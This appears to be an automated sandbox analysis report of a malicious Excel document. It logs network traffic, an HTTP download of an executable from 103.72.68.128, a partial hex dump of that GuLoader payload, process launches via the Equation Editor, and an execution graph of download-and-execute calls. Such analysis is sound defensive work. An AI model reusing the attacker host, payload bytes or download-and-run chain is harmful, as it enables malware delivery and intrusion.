                                                Oct 16, 2023 09:58:28.078886032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078908920 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078923941 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078934908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078974009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078993082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079030037 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079042912 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079075098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079118967 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079147100 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079154015 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079180002 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079199076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079233885 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079301119 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079335928 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079365969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079397917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079400063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079432011 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079461098 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079490900 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079495907 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079524994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079557896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079603910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079694033 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079732895 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079770088 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079806089 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079869986 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079905033 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079917908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.079951048 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.079989910 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080029011 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080035925 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080070019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080110073 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080147028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080149889 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080184937 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080234051 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080266953 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080296040 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080331087 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080339909 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080373049 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080401897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080434084 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.080482006 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080493927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.080517054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:29.193023920 CEST4916480192.168.2.22103.72.68.128
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 16, 2023 09:57:53.682943106 CEST138138192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:58:52.718106031 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:58:53.467312098 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:58:54.217330933 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:01.693351984 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:02.442749977 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:03.192784071 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:04.456589937 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:05.205929995 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:05.955928087 CEST137137192.168.2.22192.168.2.255
                                                Oct 16, 2023 09:59:53.384928942 CEST138138192.168.2.22192.168.2.255
                                                Oct 16, 2023 10:02:49.557529926 CEST138138192.168.2.22192.168.2.255
                                                • 103.72.68.128
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249164103.72.68.12880C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 16, 2023 09:58:24.132147074 CEST2OUTGET /S1510M/smss.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 103.72.68.128
                                                Connection: Keep-Alive


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1103.72.68.12880192.168.2.2249164C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampkBytes transferredDirectionData
                                                Oct 16, 2023 09:58:24.491461992 CEST3INHTTP/1.1 200 OK
                                                Date: Mon, 16 Oct 2023 07:58:22 GMT
                                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                Last-Modified: Mon, 16 Oct 2023 00:46:09 GMT
                                                ETag: "136c20-607cabb6cc4a3"
                                                Accept-Ranges: bytes
                                                Content-Length: 1272864
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e3 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 d0 01 00 00 04 00 00 35 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 f5 11 14 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 74 00 00 a0 00 00 00 00 a0 03 00 08 1d 02 00 00 00 00 00 00 00 00 00 08 54 13 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 5f 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3e 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a8 01 00 00 90 00 00 00 04 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 1d 02 00 00 a0 03 00 00 1e 02 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(FFF*FGwF*FvF.@FRichFPEL]`52p@@0tTp.text}_` `.rdata>pd@@.datax@.ndata`@.rsrc|@@
                                                Oct 16, 2023 09:58:24.491503954 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b
                                                Data Ascii: U\}t+}FEuH7BHPuuur@BSV57BEWPur@eEEPur@}e`p@FRVVU+MM3FQNUMVT
                                                Oct 16, 2023 09:58:24.491516113 CEST6INData Raw: e8 c4 fe ff ff e9 f9 14 00 00 53 50 e8 30 3c 00 00 e9 e2 14 00 00 53 e8 2e 16 00 00 83 f8 01 59 89 55 f0 7f 03 33 c0 40 50 ff 15 8c 70 40 00 e9 c4 14 00 00 ff 75 f8 ff 15 44 72 40 00 e9 b6 14 00 00 c1 e0 02 39 5d d4 75 26 8b 88 a0 37 42 00 6a 01
                                                Data Ascii: SP0<S.YU3@Pp@uDr@9]u&7Bj7BYUM7B7B7BwE47B3;#MDa47BV.B5Hr@;tRQE.B;$PQjuPp@
                                                Oct 16, 2023 09:58:24.491529942 CEST7INData Raw: 08 7d 0e 56 e8 21 46 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 04 00 00 0f 8d d3 0f 00 00 88 1c 30 e9 cb 0f 00 00 6a 20 e8 38 11 00 00 6a 31 8b f0 e8 2f 11 00 00 39 5d dc 50 56 75 12 ff 15 18 71 40 00 85 c0 75 7a 8b 45 d4 e9 ad 0f 00 00 ff 15
                                                Data Ascii: }V!FEy]E=0j 8j1/9]PVuq@uzE$q@3GWhVPE`q@t9]tVu$q@u}ZuSjUY;YUu;|~;sE3xE%jejU}VYUY
                                                Oct 16, 2023 09:58:24.849540949 CEST8INData Raw: f0 e8 5a 0c 00 00 6a 22 8b d8 e8 51 0c 00 00 6a 15 8b f8 e8 48 0c 00 00 6a ec e8 38 f5 ff ff 8b 45 dc 89 45 80 8b 45 f8 89 45 84 8b 45 d8 89 45 98 8a 06 f6 d8 1b c0 89 5d 8c 23 c6 89 45 88 8a 07 f6 d8 1b c0 c7 45 94 00 98 42 00 23 c7 89 45 90 8d
                                                Data Ascii: Zj"QjHj8EEEEEE]#EEB#E|P7RE@}uDuESVj1V7;9]tVtD9]|PW?;tEVq@ jP8C;EtsW?s
                                                Oct 16, 2023 09:58:24.849586964 CEST10INData Raw: 45 0a 56 50 ff 75 f0 57 ff 15 3c 71 40 00 80 3e 0a e9 53 f3 ff ff 39 5d dc 8b f2 75 2b 6a 02 e8 76 07 00 00 8b f0 3b f3 0f 84 83 03 00 00 6a 33 e8 25 07 00 00 50 56 ff 15 20 70 40 00 56 8b f8 ff 15 24 70 40 00 eb 16 6a 22 e8 0b 07 00 00 8b 4d dc
                                                Data Ascii: EVPuW<q@>S9]u+jv;j3%PV p@V$p@j"MQPV;FuEjEjEjPWES;ED3@uj#Wc;@ujpY@VUXuhWSuBPWuSuu
                                                Oct 16, 2023 09:58:24.849627972 CEST11INData Raw: 36 00 00 e9 d8 00 00 00 51 eb 7c 83 c9 ff 2b c8 89 4d d4 74 10 6a 01 e8 16 02 00 00 59 89 55 b4 89 45 d0 eb 10 ff 75 dc 8d 46 18 50 e8 f3 36 00 00 80 4e 09 01 8b 45 d4 8b 4d d0 89 0c 86 39 5d d8 0f 84 99 00 00 00 ff 75 ec e8 56 e8 ff ff e9 8c 00
                                                Data Ascii: 6Q|+MtjYUEuFP6NEM9]uVS YUD9]t#9]tPJSS`SPW5Q9]t7BM:7BWk6%BS#Qjur@9]tSSuq@E7B3_^[
                                                Oct 16, 2023 09:58:24.849685907 CEST12INData Raw: 42 00 68 00 04 00 00 05 e8 03 00 00 56 53 a3 10 37 42 00 ff 15 78 70 40 00 6a 03 68 00 00 00 80 56 e8 6f 2d 00 00 8b f8 83 ff ff 89 7d f4 89 3d 18 90 40 00 75 0a b8 04 91 40 00 e9 d6 01 00 00 56 be 00 9c 42 00 56 e8 b0 31 00 00 56 e8 89 2b 00 00
                                                Data Ascii: BhVS7Bxp@jhVo-}=@u@VBV1V+PhB1SWtp@;A@7B%~;rWS^ =7BuzjESP,Eur}ui}Instu`}softuW}NulluNEE(A
                                                Oct 16, 2023 09:58:24.849895954 CEST14INData Raw: 24 38 68 60 01 00 00 50 53 68 c8 ec 41 00 ff 15 78 71 40 00 68 88 91 40 00 68 00 2f 42 00 e8 d3 2c 00 00 ff 15 94 70 40 00 bd 00 90 42 00 50 55 e8 c1 2c 00 00 80 3d 00 90 42 00 22 c7 05 00 37 42 00 00 00 40 00 8b c5 75 0a c6 44 24 14 22 b8 01 90
                                                Data Ascii: $8h`PShAxq@h@h/B,p@BPU,=B"7B@uD$"Bt$P[&P,r@D$ u@8 t8"D$ u@D$"8/@8SuH t:u7B@@@@9uH t:uL$ {
                                                Oct 16, 2023 09:58:24.849910021 CEST15INData Raw: 41 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 ec 10 53 55 56 8b 35 14 37 42 00 57 6a 02 e8 67 2b 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 a0 42 00 e8 17 27 00 00 eb 54 bf 08 fd 41 00 53 57 53 68 44 73 40 00 68 01 00 00 80 c6 05 00 a0 42 00 30
                                                Data Ascii: A3^SUV57BWjg+3;tPhB'TASWShDs@hB0BxBs&8AuSWhbs@hs@hU&WhB'@7BB U7B7B!NH;tzVLX7B&BSWRQvD%&B:tT<"u&Bj
                                                Oct 16, 2023 09:58:24.849924088 CEST16INData Raw: d9 a3 f0 fc 41 00 75 4d 8b 35 d0 71 40 00 6a 01 57 89 3d 08 37 42 00 ff d6 6a 02 57 a3 04 fd 41 00 ff d6 6a ff 6a 1c 57 a3 d0 ec 41 00 e8 46 03 00 00 ff 35 e8 2e 42 00 6a f2 57 ff 15 88 71 40 00 6a 04 e8 d3 d6 ff ff a3 cc 2e 42 00 33 c0 40 a3 f0
                                                Data Ascii: AuM5q@jW=7BjWAjjWAF5.BjWq@j.B3@A@35@7B;|>u1Uvt$jUh5.Br@39-.B9.hA@@;D7BujC9-.BD7B9@


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:09:58:00
                                                Start date:16/10/2023
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                Imagebase:0x13f5c0000
                                                File size:28'253'536 bytes
                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:2
                                                Start time:09:58:21
                                                Start date:16/10/2023
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:09:58:27
                                                Start date:16/10/2023
                                                Path:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\audiodgse.exe"
                                                Imagebase:0x400000
                                                File size:1'272'864 bytes
                                                MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 32%, ReversingLabs
                                                • Detection: 32%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:false

                                                Target ID:6
                                                Start time:09:58:29
                                                Start date:16/10/2023
                                                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                Imagebase:0x12d0000
                                                File size:2'525'680 bytes
                                                MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:09:58:40
                                                Start date:16/10/2023
                                                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                Imagebase:0x1350000
                                                File size:9'805'808 bytes
                                                MD5 hash:326A645391A97C760B60C558A35BB068
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:9
                                                Start time:09:58:55
                                                Start date:16/10/2023
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:09:58:57
                                                Start date:16/10/2023
                                                Path:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\audiodgse.exe"
                                                Imagebase:0x400000
                                                File size:1'272'864 bytes
                                                MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Call Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                • Show Help
                                                callgraph 1 Error: Graph is empty

                                                Module: Sheet1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Sheet1"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                9

                                                Attribute VB_Name = "Sheet1"

                                                10

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                11

                                                Attribute VB_GlobalNameSpace = False

                                                12

                                                Attribute VB_Creatable = False

                                                13

                                                Attribute VB_PredeclaredId = True

                                                14

                                                Attribute VB_Exposed = True

                                                15

                                                Attribute VB_TemplateDerived = False

                                                16

                                                Attribute VB_Customizable = True

                                                Module: ThisWorkbook

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "ThisWorkbook"

                                                2

                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                9

                                                Attribute VB_Name = "ThisWorkbook"

                                                10

                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                11

                                                Attribute VB_GlobalNameSpace = False

                                                12

                                                Attribute VB_Creatable = False

                                                13

                                                Attribute VB_PredeclaredId = True

                                                14

                                                Attribute VB_Exposed = True

                                                15

                                                Attribute VB_TemplateDerived = False

                                                16

                                                Attribute VB_Customizable = True

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:4.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:35%
                                                  Total number of Nodes:214
                                                  Total number of Limit Nodes:3
                                                  execution_graph 2295 3530193 2296 35301a7 2295->2296 2297 35301b6 2296->2297 2323 353030d ExitProcess 2296->2323 2324 3530319 2323->2324 2325 3530326 21 API calls 2323->2325 2326 3530342 18 API calls 2324->2326 2328 3530333 2324->2328 2325->2324 2326->2328 2327 353037b 2328->2327 2329 35303c2 2328->2329 2330 3530359 2328->2330 2331 35303da 11 API calls 2329->2331 2330->2327 2332 35303c7 2330->2332 2333 3530363 2330->2333 2331->2332 2334 35303eb URLDownloadToFileW 2332->2334 2335 3530435 8 API calls 2332->2335 2343 353043c 2332->2343 2338 35303ab 15 API calls 2333->2338 2341 353044e 5 API calls 2334->2341 2335->2334 2336 3530463 3 API calls 2337 3530455 2336->2337 2340 353045d ShellExecuteW 2337->2340 2344 35302fb 2337->2344 2338->2327 2342 3530488 ExitProcess 2340->2342 2341->2343 2345 353047c 2342->2345 2343->2336 2347 3530326 2344->2347 2345->2344 2346 353048b ExitProcess 2345->2346 2348 353032c 2347->2348 2349 3530342 18 API calls 2348->2349 2351 3530333 2348->2351 2349->2351 2350 353037b 2351->2350 2352 35303c2 2351->2352 2353 3530359 2351->2353 2354 35303da 11 API calls 2352->2354 2353->2350 2355 35303c7 2353->2355 2360 3530363 2353->2360 2354->2355 2356 353043c 2355->2356 2357 35303eb URLDownloadToFileW 2355->2357 2358 3530435 8 API calls 2355->2358 2359 3530463 3 API calls 2356->2359 2365 353044e 5 API calls 2357->2365 2358->2357 2361 3530455 2359->2361 2362 35303ab 15 API calls 2360->2362 2364 353045d ShellExecuteW 2361->2364 2367 3530317 2361->2367 2362->2350 2366 3530488 ExitProcess 2364->2366 2365->2356 2368 353047c 2366->2368 2370 3530342 2367->2370 2368->2367 2369 353048b ExitProcess 2368->2369 2371 3530348 2370->2371 2397 3530369 2371->2397 2398 353036c 2397->2398 2399 35303ab 15 API calls 2398->2399 2400 353037b 2399->2400 2617 3530000 2619 353000e 2617->2619 2618 3530024 2619->2618 2622 3530091 2619->2622 2623 35300b2 2622->2623 2624 353030d 25 API calls 2623->2624 2625 35302fb 2624->2625 2626 3530326 21 API calls 2625->2626 2627 3530317 2626->2627 2628 3530342 18 API calls 2627->2628 2629 3530333 2628->2629 2630 353037b 2629->2630 2631 35303c2 2629->2631 2632 3530359 2629->2632 2633 35303da 11 API calls 2631->2633 2632->2630 2634 35303c7 2632->2634 2636 3530363 2632->2636 2633->2634 2635 353043c 2634->2635 2637 35303eb URLDownloadToFileW 2634->2637 2638 3530435 8 API calls 2634->2638 2639 3530463 3 API calls 2635->2639 2641 35303ab 15 API calls 2636->2641 2644 353044e 5 API calls 2637->2644 2638->2637 2640 3530455 2639->2640 2643 353045d ShellExecuteW 2640->2643 2646 3530071 2640->2646 2641->2630 2645 3530488 ExitProcess 2643->2645 2644->2635 2647 353047c 2645->2647 2647->2646 2648 353048b ExitProcess 2647->2648 2649 35301c6 2652 35300b2 2649->2652 2650 353030d 25 API calls 2651 35302fb 2650->2651 2653 3530326 21 API calls 2651->2653 2652->2649 2652->2650 2654 3530317 2653->2654 2655 3530342 18 API calls 2654->2655 2656 3530333 2655->2656 2657 353037b 2656->2657 2658 35303c2 2656->2658 2659 3530359 2656->2659 2660 35303da 11 API calls 2658->2660 2659->2657 2661 35303c7 2659->2661 2663 3530363 2659->2663 2660->2661 2662 353043c 2661->2662 2664 35303eb URLDownloadToFileW 2661->2664 2665 3530435 8 API calls 2661->2665 2666 3530463 3 API calls 2662->2666 2668 35303ab 15 API calls 2663->2668 2671 353044e 5 API calls 2664->2671 2665->2664 2667 3530455 2666->2667 2670 353045d ShellExecuteW 2667->2670 2673 35304c2 2667->2673 2668->2657 2672 3530488 ExitProcess 2670->2672 2671->2662 2674 353047c 2672->2674 2674->2673 2675 353048b ExitProcess 2674->2675 2293 353048f GetPEB 2294 353049d 2293->2294 2730 3530073 2731 35300b2 2730->2731 2732 353030d 25 API calls 2731->2732 2733 35302fb 2732->2733 2734 3530326 21 API calls 2733->2734 2735 3530317 2734->2735 2736 3530342 18 API calls 2735->2736 2738 3530333 2736->2738 2737 353037b 2738->2737 2739 35303c2 2738->2739 2741 3530359 2738->2741 2740 35303da 11 API calls 2739->2740 2742 35303c7 2740->2742 2741->2737 2741->2742 2744 3530363 2741->2744 2743 353043c 2742->2743 2745 35303eb URLDownloadToFileW 2742->2745 2746 3530435 8 API calls 2742->2746 2747 3530463 3 API calls 2743->2747 2749 35303ab 15 API calls 2744->2749 2752 353044e 5 API calls 2745->2752 2746->2745 2748 3530455 2747->2748 2751 353045d ShellExecuteW 2748->2751 2754 35304c2 2748->2754 2749->2737 2753 3530488 ExitProcess 2751->2753 2752->2743 2755 353047c 2753->2755 2755->2754 2756 353048b ExitProcess 2755->2756 2892 3530126 2899 35300b2 2892->2899 2893 35301b6 2894 353030d 25 API calls 2895 35302fb 2894->2895 2896 3530326 21 API calls 2895->2896 2897 3530317 2896->2897 2898 3530342 18 API calls 2897->2898 2900 3530333 2898->2900 2899->2893 2899->2894 2901 353037b 2900->2901 2902 35303c2 2900->2902 2903 3530359 2900->2903 2904 35303da 11 API calls 2902->2904 2903->2901 2905 35303c7 2903->2905 2907 3530363 2903->2907 2904->2905 2906 353043c 2905->2906 2908 35303eb URLDownloadToFileW 2905->2908 2909 3530435 8 API calls 2905->2909 2910 3530463 3 API calls 2906->2910 2912 35303ab 15 API calls 2907->2912 2915 353044e 5 API calls 2908->2915 2909->2908 2911 3530455 2910->2911 2914 353045d ShellExecuteW 2911->2914 2917 35304c2 2911->2917 2912->2901 2916 3530488 ExitProcess 2914->2916 2915->2906 2918 353047c 